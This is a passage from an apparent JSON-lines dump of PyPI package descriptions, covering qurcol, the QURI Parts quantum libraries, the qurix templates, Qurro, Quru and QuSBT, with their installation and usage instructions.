CSV.This tool only targets the use case of a basic exploration of a file content.\nThe author believes that aforementioned Spark, Pandas, etc. should be used\ninstead in any scenario which goes beyond that.FeaturesCommand line tool to:view a columnar file contentprint a columnar file schemaconvert a columnar file to a CSV filerun SQL queries on the data from a columnar fileList of supported columnar file formats:Apache ParquetUsers should be aware of the size of the source files and keep in mind that\nthe file is read in memory when being processed by this tool.StatusThis software is generally available. This software is intended to be used in\ncommand line by individual users. It is not intended for use in a production\nenvironment.The software is provided \"as is\", without warranty of any kind, express or\nimplied, including but not limited to the warranties of merchantability,\nfitness for a particular purpose and noninfringement. In no event shall the\nauthors or copyright holders be liable for any claim, damages or other\nliability, whether in an action of contract, tort or otherwise, arising from,\nout of or in connection with the software or the use or other dealings in the\nsoftware.InstallationInstall from PyPI:pip install [--user] qurcolAlternatively, you can download a release from the Release page in GitHub.UsageBuilt-in help provides detailed usage information with examples:qurcol --helpFew examples are given below to demonstrate the usage. 
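For instance, a quick sanity check on the row count can be done with the sql subcommand (the file name here is hypothetical; `data` is the fixed table name that qurcol loads the file into, as described under "SQL syntax" below):

```
qurcol sql -c example.parquet "select count(*) from data"
```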
Please, refer to the\nbuilt-in help for all details though (it is not practical to keep a duplicate\nof the \"help\" in this README).Print an extract (few first rows, few last rows) of the file content:qurcol view [[--head=N] [--tail=N] | [--all]] [--output=table|csv] FILEFor example, view to the snippet of a file content:qurcol view FILEor, export entire file in CSV format:qurcol --all --output=csv FILE > OUTPUT_FILEPrint the file schema:qurcol schema [--output=table|csv] FILERun an inline SQL query on the file content:qurcol sql -c FILE \"QUERY\"SQL syntaxqurcol sqlcommand loads the file into an in-memory SQLite database. Therefore,\ndata types and SQL syntax are those of SQLite v.3. The command will attempt\nits best to map the data types from the source file to the data types available\nin SQLite, but users should be aware of the fact that SQLite data types are\noften less expressive (for example, there is no data type to represent\ndate/time information).Data is loaded into a table with the namedata.Finally, for a complete example, the following command:qurcol sql -c --output=csv FILE \"select * from data\"will have same effect as:qurcol view --all --output=csv FILEWhy?Here are few sample use cases:As a Data Engineer I want to review the schema of a file in a data\nlake, in order to consume them accordingly in my software.As a Data Ops Engineer I want to review the content of the sample file from\na data lake, in order to ensure that the data is being produced into it.As a Data Engineer I want to query some data from a file in a data lake, in\norder to review/confirm the properties of the data I am going to use.As a Product Manager I want to load into a spreadsheet the.parquetfile\nshared with me by Data Science team, in order to review its content.Not featuresFor any tool it is equally important to know what can and and what cannot be\ndone with it. Following potential features were considered for inclusion but\ndecided to be not in the current scope of this tool, unless a clear use case is\ndefined for them.Conversion to other \"complex\" data formats (e.g. Excel), because it will add\nmore dependencies to the tool, while CSV can be imported to a spreadsheet\neasily.Reading data from files in other \"file systems\" (HDFS, S3, etc.), because\nthere exist command line tools to \"dowload\" data from these.Any advanced data exploration and plotting, because there is no single way\nto do that. You may use a combination ofJupyter,PandasandSeaborninstead, for example.Any advanced form of querying the data that goes beyond SQL. You may usePandasorApache\nSparkinstead, for example.ContributionsContributions are very welcome. Please, feel free to submit an issue or create\na Pull Request.Development environmentThis software is written in Python 3, and has a modern development environment\nthat depends onPoetryandNox.Run all tests:nox -s testsOr, to quickly run tests on a single Python version only:poetry run pytest --covRun linters:nox lintReformat code:nox -s blackOr, check code format without reformatting:nox -s black -- --check .Full pre-commit check:noxNote: Nox is configured to reuse virtualenvs by default; if you want to run Nox\nin a clean environment, add--no-reuse-existing-virtualenvsargument.Criteria for Pull RequestsThe PR should pass on CI. CI is configured to run all essential controls\n(tests, flake8, mypy, black). 
You can easily run same controls in a local\ndevelopment environment before the PR submission.Beyond code formatting, please, try to stick to the overall code style, such\nas the choice of variable names, code structure, etc.LicenseLicensed under theApache License v2.0."} +{"package": "quri-parts", "pacakge-description": "QURI PartsQURI Parts is an open source library suite for creating and executing quantum algorithms on various quantum computers and simulators. QURI Parts focuses on the followings:Modularity and extensibility: It provides small parts with which you can assemble your own algorithms. You can also use ready-made algorithms, customizing their details by replacing sub components easily.Platform independence: Once you assemble an algorithm with QURI Parts, you can execute it on various quantum computers or simulators without modifying the main algorithm code. Typically you only need to replace a few lines to switch to a different device or simulator.Performance: When dealing with a simulator, it is often the case that classical computation before and after quantum circuit simulation (such as data preparation and post processing) takes considerable time, spoiling performance of the simulator. We put an emphasis on computational performance and try to get the most out of simulators.Covered areas and componentsCurrent QURI Parts covers the following areas, provided as individual components.\nPlease note that more components will be added in future.\nYou are also encouraged to propose or author new components as necessary.Core componentsquri-parts-circuit: Quantum circuitGate, circuit, noise etc.quri-parts-core: General componentsOperator, state, estimator, sampler etc.Platform (device/simulator) supportQuantum circuit simulatorsquri-parts-qulacs:Qulacsquri-parts-stim:Stimquri-parts-itensor:ITensorquri-parts-tket:TKetQuantum platforms/SDKsquri-parts-braket:Amazon Braket SDKquri-parts-cirq:Cirq(Only circuit and operator conversion is supported yet)quri-parts-qiskit:Qiskitquri-parts-quantinuum:Quantinuumquri-parts-ionq:IONQIntermediate representation supportquri-parts-openqasm:OpenQASM 3.0quri-parts-algo: AlgorithmsAnsatz, optimizer, error mitigation etc.Chemistryquri-parts-chem: General conceptsFermion-qubit mapping, electron integrals, ansatz etc.quri-parts-pyscf:PySCFLibrary supportquri-parts-openfermion:OpenFermionInstallationQURI Parts requires Python 3.9.8 or later.Usepipto install QURI Parts.\nDefault installation only contains components not depending specific platforms (devices/simulators) or external libraries.\nYou need to specifyextraswith square brackets ([]) to use those platforms and external libraries with QURI Parts:# Default installation, no extras\npip install quri-parts\n\n# Use Qulacs, a quantum circuit simulator\npip install \"quri-parts[qulacs]\"\n\n# Use Amazon Braket SDK\npip install \"quri-parts[braket]\"\n\n# Use Qulacs and OpenFermion, a quantum chemistry library for quantum computers\npip install \"quri-parts[qulacs,openfermion]\"Currently available extras are as follows:qulacsbraketqiskitcirqopenfermionstimopenqasmitensorYou can also install individual components (quri-parts-*) directly.\nIn fact,quri-partsis a meta package, a convenience method to install those individual components.Installation from local source treeIf you check out the QURI Parts repository and want to install from that local source tree, you can userequirements-local.txt.\nInrequirements-local.txt, optional components are commented out, so please uncomment them as necessary.pip 
install -r requirements-local.txtDocumentation and tutorialsDocumentation of QURI Parts is available athttps://quri-parts.qunasys.com.Tutorialswould be a good starting point.Release notesSeeReleases pageon GitHub.Contribution guidelinesIf you are interested in contributing to QURI Parts, please take a look at ourcontribution guidelines.AuthorsQURI Parts developed and maintained byQunaSys Inc.. All contributors can be viewed onGitHub.LicenseQURI Parts is licensed underApache License 2.0."} +{"package": "quri-parts-algo", "pacakge-description": "QURI Parts AlgoQURI Parts Algo is a library containing implementations of algorithms for quantum computers.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-algoLicenseApache License 2.0"} +{"package": "quri-parts-braket", "pacakge-description": "QURI Parts BraketQURI Parts Braket is a support library for using Amazon Braket SDK with QURI Parts.\nYou can combine your code written in QURI Parts with this library to execute it on Amazon Braket.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-braketLicenseApache License 2.0"} +{"package": "quri-parts-chem", "pacakge-description": "QURI Parts ChemQURI Parts Chem is a library containing implementations of quantum computer algorithms for chemistry.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-chemLicenseApache License 2.0"} +{"package": "quri-parts-circuit", "pacakge-description": "QURI Parts CircuitQURI Parts Circuit is a platform-independent quantum circuit library.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-circuitLicenseApache License 2.0"} +{"package": "quri-parts-cirq", "pacakge-description": "QURI Parts CirqQURI Parts Cirq is a support library for using Cirq with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-cirqLicenseApache License 2.0"} +{"package": "quri-parts-core", "pacakge-description": "QURI Parts CoreQURI Parts Core is a core component of QURI Parts, a platform-independent library for quantum computing.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-coreLicenseApache License 2.0"} +{"package": "quri-parts-honeywell", "pacakge-description": "QURI Parts HoneywellQURI Parts Honeywell is a support library for using Honeywell with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-honeywellLicenseApache License 2.0"} +{"package": "quri-parts-ionq", "pacakge-description": "QURI Parts IonQQURI Parts IonQ is a support library for using IonQ with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-ionqLicenseApache License 2.0"} +{"package": "quri-parts-itensor", "pacakge-description": "QURI Parts ITensorQURI Parts ITensor is a support library for using ITensor with QURI Parts.This library calls ITensor's Julia library from Python using JuliaCall, so you need to install Julia. 
To install Julia, seethe official documentation.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-itensorLicenseApache License 2.0"} +{"package": "quri-parts-openfermion", "pacakge-description": "QURI Parts OpenFermionQURI Parts OpenFermion is a support library for using OpenFermion with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-openfermionLicenseApache License 2.0"} +{"package": "quri-parts-openqasm", "pacakge-description": "QURI Parts OpenQASMQURI Parts OpenFermion is a support library for using OpenQASM 3 with QURI Parts.Note: some gates (SqrtX, SqrtXdag, SqrtY, SqrtYdag) are not implemented yet.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-openqasmLicenseApache License 2.0"} +{"package": "quri-parts-pyscf", "pacakge-description": "QURI Parts PySCFQURI Parts PySCF is a support library for using PySCF with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-pyscfLicenseApache License 2.0"} +{"package": "quri-parts-qiskit", "pacakge-description": "QURI Parts QiskitQURI Parts Qiskit is a support library for using Qiskit with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-qiskitLicenseApache License 2.0"} +{"package": "quri-parts-quantinuum", "pacakge-description": "QURI Parts QuantinuumQURI Parts Quantinuum is a support library for using Quantinuum with QURI Parts.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-quantinuumLicenseApache License 2.0"} +{"package": "quri-parts-qulacs", "pacakge-description": "QURI Parts QulacsQURI Parts Qulacs is a support library for using Qulacs with QURI Parts.\nYou can combine your code written in QURI Parts with this library to execute it on Qulacs.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-qulacsLicenseApache License 2.0"} +{"package": "quri-parts-riqu", "pacakge-description": "QURI Parts riquriqu (RESTInterface forQuantum Computing) is an interface for using quantum computers\nthrough cloud services and designed by Center for Quantum Information and Quantum Biology, Osaka University (referred to as QIQB).QURI Parts riqu is a support library for using riqu interface with QURI Parts, developed by QIQB.This package is experimental and may undergo breaking changes without notice.\nUse it at your own risk.InstallationQURI Parts requires Python 3.9.8 or later.Usepipto install QURI Parts riqu.pip install quri-parts-riquInstallation from local source treeIf you check out the QURI Parts riqu repository and want to install from that local source tree, you can usepoetry installcommand.poetry installDocumentation and tutorialsQURI Parts DocumentationQURI Parts riqu DocumentationQURI Parts riqu TutorialsRepositoryQURI Parts RepositoryQURI Parts riqu RepositoryRelease notesSeeReleases pageon GitHub.Contribution guidelinesIf you are interested in contributing to QURI Parts, please take a look at ourcontribution guidelines.AuthorsQURI Parts riqu developed and maintained byQIQB. 
All contributors can be viewed onGitHub.LicenseApache License 2.0"} +{"package": "quri-parts-stim", "pacakge-description": "QURI Parts StimQURI Parts Stim is a support library for using Stim with QURI Parts.\nYou can combine your code written in QURI Parts with this library to execute it on Stim.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-stimLicenseApache License 2.0"} +{"package": "quri-parts-tket", "pacakge-description": "QURI Parts tketQURI Parts tket is a support library for using tket with QURI Parts.\nYou can combine your code written in QURI Parts with this library to execute it on tket.DocumentationQURI Parts DocumentationInstallationpip install quri-parts-tketLicenseApache License 2.0"} +{"package": "qurix-package-template", "pacakge-description": "Python package templateTemplate for Python packages for qurix Technology.StructureA normal Python package will start with the namespacequrixas in this sample package. A sample structure is as follows:.\n\u251c\u2500\u2500 LICENCE\n\u251c\u2500\u2500 Makefile\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 qurix\n\u2502 \u2514\u2500\u2500 \n\u2502 \u2514\u2500\u2500 \n\u2502 \u251c\u2500\u2500 __init__.py\n\u2502 \u251c\u2500\u2500 __version__.py\n\u2502 \u2514\u2500\u2500 \n\u251c\u2500\u2500 requirements.txt\n\u251c\u2500\u2500 setup.py\n\u2514\u2500\u2500 tests\n \u251c\u2500\u2500 __init__.py\n \u2514\u2500\u2500 test_client.pyVersioning and releasePackage versions will be identified according tosemantic versioning. The release process will deploy in bothTest PyPIandPyPI.gitGraph\n commit\n branch staging\n branch feature/some-feature\n checkout feature/some-feature\n commit\n commit\n checkout staging\n merge feature/some-feature id: \"Test PyPI\"\n checkout main\n merge staging id: \"Release in PyPI\" tag: \"v0.1.0\"\n branch fix/some-fix\n checkout fix/some-fix\n commit\n checkout staging\n merge fix/some-fix id: \"Test PyPI again\"\n checkout main\n merge staging id: \"New fix release in PyPI\" tag: \"v0.1.1\"DeploymentUsing Github Actions. See.github/worfklows/"} +{"package": "qurix-sample-package", "pacakge-description": "Python package templateTemplate for Python packages for qurix Technology.StructureA normal Python package will start with the namespacequrixas in this sample package. A sample structure is as follows:.\n\u251c\u2500\u2500 LICENCE\n\u251c\u2500\u2500 Makefile\n\u251c\u2500\u2500 README.md\n\u251c\u2500\u2500 qurix\n\u2502 \u2514\u2500\u2500 \n\u2502 \u2514\u2500\u2500 \n\u2502 \u251c\u2500\u2500 __init__.py\n\u2502 \u251c\u2500\u2500 __version__.py\n\u2502 \u2514\u2500\u2500 \n\u251c\u2500\u2500 requirements.txt\n\u251c\u2500\u2500 setup.py\n\u2514\u2500\u2500 tests\n \u251c\u2500\u2500 __init__.py\n \u2514\u2500\u2500 test_module.pyVersioning and releasePackage versions will be identified according tosemantic versioning. The release process will deploy in bothTest PyPIandPyPI.%%{init: { 'logLevel': 'debug', 'theme': 'base', 'gitGraph': {'rotateCommitLabel': true}} }%%\ngitGraph\n commit\n branch staging\n branch feat/some-feature\n checkout feat/some-feature\n commit\n commit\n checkout staging\n merge feat/some-feature id: \"Rel. Test PyPI 0\" tag: \"v0.1.0rc0\"\n checkout main\n merge staging id: \"Rel. PyPI 0\" tag: \"v0.1.0\"\n branch fix/some-fix\n checkout fix/some-fix\n commit\n checkout staging\n merge fix/some-fix id: \"Rel. Test PyPI 1\" tag: \"v0.1.1rc0\"\n checkout main\n merge staging id: \"Rel. 
PyPI 1\" tag: \"v0.1.1\"DeploymentAutomatic deployments via Github Actions. See.github/worfklows/"} +{"package": "qurl", "pacakge-description": "qurlPython sibling of the Haskell ourl projecthttps://github.com/nosarthur/ourl"} +{"package": "qurpc", "pacakge-description": "qurpcRPC for QuLab"} +{"package": "qurro", "pacakge-description": "Qurro: Quantitative Rank/Ratio Observations(Pronounced \"churro.\")What does this tool do?Lots of tools for analyzing \" 'omic\" datasets can producefeature rankings. These rankings can be used as a guide to look at thelog-ratiosof certain features in a dataset. Qurro is a tool for visualizing and exploring both of these types of data.What are feature rankings?The term \"feature rankings\" includesdifferentials, which we define as the estimated log-fold changes for features' abundances across different sample types. You can get this sort of output from lots of \"differential abundance\" tools, including but definitely not limited toALDEx2,Songbird,Corncob,DESeq2,edgeR, etc.The term \"feature rankings\" also includesfeature loadingsin abiplot(seeAitchison and Greenacre 2002); you can get biplots from runningDEICODE,\nwhich is a tool that works well with microbiome datasets, or from a variety of other methods.Differentials and feature loadings alike can be interpreted as rankings -- you\ncan sort them numerically to \"rank\" features based on their association with\nsome sort of variation in your dataset.What can we do with feature rankings?A common use of these rankings is examining thelog-ratiosof\nparticularly high- or low-ranked features across the samples in your dataset,\nand seeing how these log-ratios relate to your sample metadata (e.g. \"does\nthis log-ratio differ between 'healthy' and 'sick' samples?\"). For\ndetails as to why this approach is useful, check outthis open access paper.How does this tool help?Qurro is an interactive web application for visualizing feature rankings\nand log-ratios.It does this\nusing a two-plot interface: on the left side of the screen, a \"rank plot\" shows\nhow features are ranked for a selected ranking, and on the right side of the\nscreen a \"sample plot\" shows the log-ratios of selected features' abundances\nwithin samples. There are a variety of controls available for selecting\nfeatures for a log-ratio, and changing the selected log-ratio updates both the\nrank plot (highlighting selected features) and the sample plot (changing the\ny-axis value of each sample to match the selected log-ratio).A paper describing Qurro is now available at NAR Genomics and Bioinformaticshere.How do I use this tool?Qurro can be used standalone (as a Python 3 script that generates a\nfolder containing a HTML/JS/CSS visualization) or as aQIIME 2plugin (that generates a QZV file that can be\nvisualized atview.qiime2.orgor by usingqiime tools view).Qurro is still being developed, so backwards-incompatible changes might\noccur. 
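To make the log-ratio idea described above concrete, here is a minimal pandas sketch; the feature table and column names are invented for illustration, and this is not Qurro's own interface, which does the feature selection and plotting interactively:

```python
import numpy as np
import pandas as pd

# Hypothetical feature table: rows are samples, columns are feature counts.
table = pd.DataFrame(
    {"feature_A": [12, 30, 5], "feature_B": [40, 8, 22]},
    index=["sample1", "sample2", "sample3"],
)

# Natural log-ratio of two selected features within each sample.
# A pseudocount of 1 is used here only to avoid log(0) in this sketch.
log_ratio = np.log((table["feature_A"] + 1) / (table["feature_B"] + 1))
print(log_ratio)
```

Qurro plots this kind of per-sample value on the y-axis of its sample plot for whichever log-ratio is currently selected.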
If you have any bug reports, feature requests, questions, or if you just\nwant to yell at me, then feel free toopen an issuein this repository!DemosSee theQurro websitefor a list of\ninteractive demos using real datasets.Screenshot: Visualizing KEGG orthologs in metagenomic data from the Red SeaThis visualization (which uses data fromthis study, with\ndifferentials generated bySongbird)\ncan be viewed onlinehere.Installation and UsageYou can install Qurro usingpiporconda.System requirementsIf you're using Qurro within QIIME 2,you will need a QIIME 2 version of at\nleast 2020.11.If you're using Qurro outside of QIIME 2,you will need a Python version of\nat least 3.6 and less than 3.10.In either case, Qurro should work with most modern web browsers; Firefox or Chrome are\nrecommended.Installing withpippipinstallcython\"numpy >= 1.12.0\"pipinstallqurroInstalling withcondacondainstall-cconda-forgequrroTemporary CaveatCertain characters in column names in the sample metadata, feature metadata (if passed), and feature differentials (if passed) will be replaced with similar characters or just removed entirely:Old Character(s)New Character.:])[(\\|'or\"NothingThis is due to some downstream issues with handling these sorts of characters\nin field names. Seethis issuefor context.TutorialsIn-depth tutorialsThese tutorials are all good places to start, depending on what sort of data and\nfeature rankings you have.Color Composition tutorialData Summary:Color composition data from abstract paintingsFeature rankings: Feature loadings in an arbitrary compositional biplotQurro used through QIIME 2 or standalone?: Standalone\"Moving Pictures\" tutorialData Summary:Microbiome 16S rRNA marker gene sequencing data from four types of body site samplesFeature rankings: Feature loadings in aDEICODEbiplotQurro used through QIIME 2 or standalone?: QIIME 2Transcriptomics tutorialData Summary:Gene expression (\"RNA-Seq\") data from TCGA tumor and \"solid tissue normal\" samplesFeature rankings:ALDEx2differentialsQurro used through QIIME 2 or standalone?: StandaloneSelection tutorialThere are a lot of different ways to select features in Qurro, and the\ninterface can be difficult to get used to. This document describes all of these\nmethods, and provides some examples of where they could be useful in practice.Selection tutorialBasic command-line tutorialsThese tutorials show examples of using Qurro in identical ways both inside and\noutside of QIIME 2.Sleep Apnea tutorialFeature rankings: feature loadings in aDEICODEbiplotRed Sea tutorialFeature rankings:SongbirddifferentialsQarcoalQarcoal(pronounced \"charcoal\") is a new part of Qurro that lets you\ncompute log-ratios based on taxonomic searching directly from the command-line.\nThis can be useful for a variety of reasons.Currently, Qarcoal is only available through Qurro's QIIME 2 plugin interface.\nPlease seeqarcoal_example.ipynbfor a demonstration of using Qarcoal.PosterWe presentedthis posteron Qurro at the2019 CRISP Annual Review.\nThe data shown here is already slightly outdated compared to the actual Qurro paper (e.g. 
the differentials are slightly different), but feel free to check out the poster anyway!AcknowledgementsDependenciesCode files for the following projects are distributed withinqurro/support_files/vendor/.\nSee thequrro/dependency_licenses/directory for copies of these software projects'\nlicenses (each of which includes a respective copyright notice).VegaVega-LiteVega-EmbedjQueryDataTablesRequireJSBootstrapBootstrap IconsWe make use of the \"Question fill\" icon's SVG, as well as some example code\nfor embedding this or other icons in CSS.Popper.js(included within the Bootstrap JS \"bundle\" file)The following software projects are required for Qurro's python code\nto function, although they are not distributed with Qurro (and are\ninstead installed alongside Qurro).Altairbiom-formatclickNumPypandasscikit-bioTesting DependenciesFor python testing/style checking, Qurro usespytest,pytest-cov,flake8, andblack. You'll also need to have QIIME 2\ninstalled to run most of the python tests (note that, due to click vs. black\nvs. QIIME 2 dependency issues, you should use a QIIME 2 environment of at least\n2022.8; seeCONTRIBUTING.mdfor details).For JavaScript testing/style checking, Qurro usesMocha,Chai,mocha-headless-chrome,nyc,jshint,\nandprettier.Qurro also usesTravis-CIandCodecov.The Jupyter notebooks in Qurro'sexample_notebooks/folder are automatically\nrerun usingnbconvert,\nalso.Data SourcesThe test data located inqurro/tests/input/mackerel/were exported from\nQIIME 2 artifacts inthis repository. These data are from Minich et al. 2020 [1].The test data located inqurro/tests/input/byrd/are fromthis repository.\nThese data, in turn, originate from Byrd et al.'s 2017 study on atopic\ndermatitis [2].The test data located inqurro/tests/input/sleep_apnea/(and inexample_notebooks/DEICODE_sleep_apnea/input/)\nare fromthis Qiita study,\nwhich is associated with Tripathi et al.'s 2018 study on sleep apnea [4].The test data located inqurro/tests/input/moving_pictures/(and inexample_notebooks/moving_pictures/data/)\nare fromthe QIIME 2 moving pictures tutorial.\nTheordinationfiles in these folders were computed based on theDEICODE moving pictures tutorial.\nThese data (sans the DEICODE ordination) are associated with Caporaso et al. 2011 [5].Lastly, the data located inqurro/tests/input/red_sea(and inexample_notebooks/songbird_red_sea/input/, and shown in the\nscreenshot above) were taken from Songbird's GitHub repository in itsdata/redsea/folder, and are associated with Thompson et al. 2017 [3].LogoQurro's logo was created using theLalezarfont.\nAlso, shout out tothis gistfor showing how to center images in GitHub markdown files (which is more of a hassle than it sounds).Special ThanksThe design of Qurro was strongly inspired byEMPerorandq2-emperor, along withDEICODE. A big shoutout to\nYoshiki V\u00e1zquez-Baeza for his help in planning this project, as well as to\nCameron Martino for a ton of work on getting the code in a distributable state\n(and making it work with QIIME 2). 
Thanks also to Jamie Morton, who wrote the\noriginal code for producing rank and sample plots from which this is derived.And thanks to a bunch of the Knight Lab for helping name the tool :)Citing QurroIf you use Qurro in your research, please cite it!\nThe preferred citation for Qurro isthis manuscript at NAR Genomics and\nBioinformatics.\nHere's the BibTeX:@article {fedarko2020,\n author = {Fedarko, Marcus W and Martino, Cameron and Morton, James T and Gonz\u00e1lez, Antonio and Rahman, Gibraan and Marotz, Clarisse A and Minich, Jeremiah J and Allen, Eric E and Knight, Rob},\n title = \"{Visualizing\u00a0\u2019omic feature rankings and log-ratios using Qurro}\",\n journal = {NAR Genomics and Bioinformatics},\n volume = {2},\n number = {2},\n year = {2020},\n month = {04},\n issn = {2631-9268},\n doi = {10.1093/nargab/lqaa023},\n url = {https://doi.org/10.1093/nargab/lqaa023},\n note = {lqaa023},\n eprint = {https://academic.oup.com/nargab/article-pdf/2/2/lqaa023/33137933/lqaa023.pdf},\n}References[1] Minich, J. J., Petrus, S., Michael, J. D., Michael, T. P., Knight, R., &\nAllen, E. E. (2020). Temporal, environmental, and biological drivers of the\nmucosal microbiome in a wild marine fish, Scomber japonicus.mSphere, 5(3),\ne00401-20.Link.[2] Byrd, A. L., Deming, C., Cassidy, S. K., Harrison, O. J., Ng, W. I., Conlan, S., ... & NISC Comparative Sequencing Program. (2017). Staphylococcus aureus and Staphylococcus epidermidis strain diversity underlying pediatric atopic dermatitis.Science Translational Medicine, 9(397), eaal4651.Link.[3] Thompson, L. R., Williams, G. J., Haroon, M. F., Shibl, A., Larsen, P.,\nShorenstein, J., ... & Stingl, U. (2017). Metagenomic covariation along densely\nsampled environmental gradients in the Red Sea.The ISME Journal, 11(1), 138.Link.[4] Tripathi, A., Melnik, A. V., Xue, J., Poulsen, O., Meehan, M. J., Humphrey, G., ... & Haddad, G. (2018). Intermittent hypoxia and hypercapnia, a hallmark of obstructive sleep apnea, alters the gut microbiome and metabolome.mSystems, 3(3), e00020-18.Link.[5] Caporaso, J. G., Lauber, C. L., Costello, E. K., Berg-Lyons, D., Gonzalez, A., Stombaugh, J., ... & Gordon, J. I. (2011). Moving pictures of the human microbiome.Genome Biology, 12(5), R50.Link.LicenseThis tool is licensed under theBSD 3-clause license.\nOur particular version of the license is based onscikit-bio'slicense."} +{"package": "qurry", "pacakge-description": "QurryQurry is a prototype of a quantum probabilistic programming language, done with theunitary fund.\nThe official project duration is one year, but the language may be usable before then (and in fact, can already be used to use all of the QUIL spec with some useful abstractions on top, like if statements, variable names, and so on).For more information on the progress of the project, see asummary(from early October), or an in-progresspaper.If you use Qurry or are influenced by it, all I ask is that you cite the software. 
A bibtex citation is available at the end of this file.\nOnce a paper is published, please cite that (I will update it here).Since Qurry is currently in major rework (untilSeptember 16th, 2019), the instructions and description previously available on this readme have been commented out.@misc{saldyt_2018, title={Qurry, a probabilistic quantum programming language}, url={https://github.com/LSaldyt/qurry}, journal={GitHub}, author={Saldyt, Lucas}, year={2018}, month={Nov}}"} +{"package": "quru", "pacakge-description": "Quru in one sentenceQuru is a python workflow framework to easily swarm up a bunch of workers to process tasks in a streaming fashion.What does \"Quru\" mean?Quru (Chinese \u77bf\u5982, pronounced keeru) is a bird-like beast with a human face and three feet, initially described in Shan Hai Jing, a classic book that describes mythic geography and beasts.How to run demoYou will need to set up rabbitmq and redis instances to get Quru running. A docker compose file for quick setup is provided indemofolder.\n0. Git clone this repo and add the current path to yourPYTHONPATHenvironment variable.In your terminal,cdto the demo folder.Runmake run-infrato get rabbitmq and redis running.Runpython worker.py. This instance starts the worker that handles tasks.Runpython sender.py. This instance periodically dispatches tasks to the worker."} +{"package": "qusbt", "pacakge-description": "QuSBT: Search-Based Testing of Quantum ProgramsDescriptionGenerating a test suite for a quantum program such that it has the maximum number of failing tests is an optimization problem. For such optimization, search-based testing has shown promising results in the context of classical programs. To this end, we present a test generation tool for quantum programs based on a genetic algorithm, called QuSBT (Search-based Testing of Quantum Programs). QuSBT automates the testing of quantum programs, with the aim of finding a test suite having the maximum number of failing test cases. QuSBT utilizes IBM's Qiskit as the simulation framework for quantum programs. We present the tool architecture in addition to the implemented methodology (i.e., the encoding of the search individual, the definition of the fitness function expressing the search problem, and the test assessment w.r.t. two types of failures). Finally, we report results of the experiments in which we tested a set of faulty quantum programs with QuSBT to assess its effectiveness.How to use QuSBT?Quantum Program FileThe quantum program should be written with Qiskit.The code has to be structured in a function named 'run' with one parameter that refers to the quantum circuit.Users only need to add gates to the circuit and measure output qubits to get the output. They don't need to set any register, initialize circuits, choose the simulation, or execute the circuits in the 'run' function (a minimal sketch of such a 'run' function is shown just below).Program SpecificationFor each input, there should be one or more outputs.
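A minimal sketch of the 'run' function described under Quantum Program File above (the gate choices are purely illustrative, and the assumption that classical bits for the measurements are already prepared follows from the statement that users do not need to set any registers themselves):
def run(qc):
    # add gates to the Qiskit circuit handed in by QuSBT
    qc.h(2)
    qc.cx(2, 0)
    qc.x(1)
    # measure the output qubits; the classical bits are assumed to be managed by the QuSBT harness
    qc.measure(0, 0)
    qc.measure(1, 1)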
The probability of occurrence of one output can be shown as a decimal with binary numbers of input-output pair, and the input and the output are separated by a comma.Here is one simple example:00,1=0.5\n00,0=0.5\n01,1=0.5\n01,0=0.5Specially, the dash symbol '-' represents both '0' and '1' for inputs and outputs, which means the example above can be expressed as below:0-,-=0.5Configuration FileThe configuration file should be written in an INI file.\nThe configuration file is described below.[program]\nroot=\n;(Required)\n;Description: The absolute root of your quantum program file.\nnum_qubit=\n;(Required)\n;Description: The total number of qubit of your quantum program.\ninputID=\n;(Required)\n;Description: The IDs of input qubits.\n;Format: A non-repeating sequence separated by commas.\noutputID=\n;(Required)\n;Description: The IDs of output qubits which are the qubits to be measured.\n;Format: A non-repeating sequence separated by commas.\n\n\n[qusbt_configuration]\nbeta=\n;(Optional)\n;Description: The percentage of possible inputs as the number of test cases in a test suite.\nM=\n;(Optional)\n;Description: The number of test cases in a test suite.\n;Attention: You should use either 'beta' or 'M'. We use 'beta' as 0.05 by default.\n\n\n[GA_parameter]\npopulation_size=\n;(Optional)\n;Description: The population size in GA, population_size=10 by default.\noffspring_population_size=\n;(Optional)\n;Description: The offspring population size in GA, offspring_population_size=10 by default.\nmax_evaluations=\n;(Optional)\n;Description: The maximum evaluations in GA, max_evaluations=500 by default.\nmutation_probability=\n;(Optional)\n;Description: mutation probability in GA, mutation_probability=1.0/M, 'M' is the size of a test suite by default.\nmutation_distribution_index=\n;(Optional)\n;Description: mutation distribution in GA, mutation_distribution_index=20 by default.\ncrossover_probability=\n;(Optional)\n;Description: crossover probability in GA, crossover_probability=0.9 by default.\ncrossover_distribution_index=\n;(Optional)\n;Description: crossover probability in GA, crossover_distribution_index=20 by default.\n\n\n[program_specification]\n;Description: The program specification.\n;Format:input string (binary),output string (binary)=probability\n;Example:\n;00,1=0.5\n;00,0=0.5\n;01,1=0.5\n;01,0=0.5\n;or\n;0-,-=0.5\n;Attention: '-' can refer to both '0' and '1'.Command Line OperationYou can provide the root of the configuration file and run QuSBT.from qusbt.qusbt_search import qusbt\n\nqusbt(\"configuration.ini\")QuSBT will assess the results according to the two test oracles that have been proposed inthis paper:uof: Whether an observed output is correct according to program specification. If not, the program is failed;wodf: If all the observed outputs corresponding to an input are valid, then it compares their observed probabilities with the ones specified in the Program Specification file. If the differences are statistically significant (i.e., a p-value lower than the chosen significance level), the program is failed.After running, you get one Excel file containing solution and iteration informationVideo DemonstrationA video demo is availablehere.Experimental DataExperimental data including quantum programs, and program specifications can be downloadedhere.ExtensionOne can checkout the code from GitHub and provide extensions to QuSBT.PaperX. Wang, P. Arcaini, T. Yue, S. Ali. QuSBT: Search-Based Testing of Quantum Programs. 
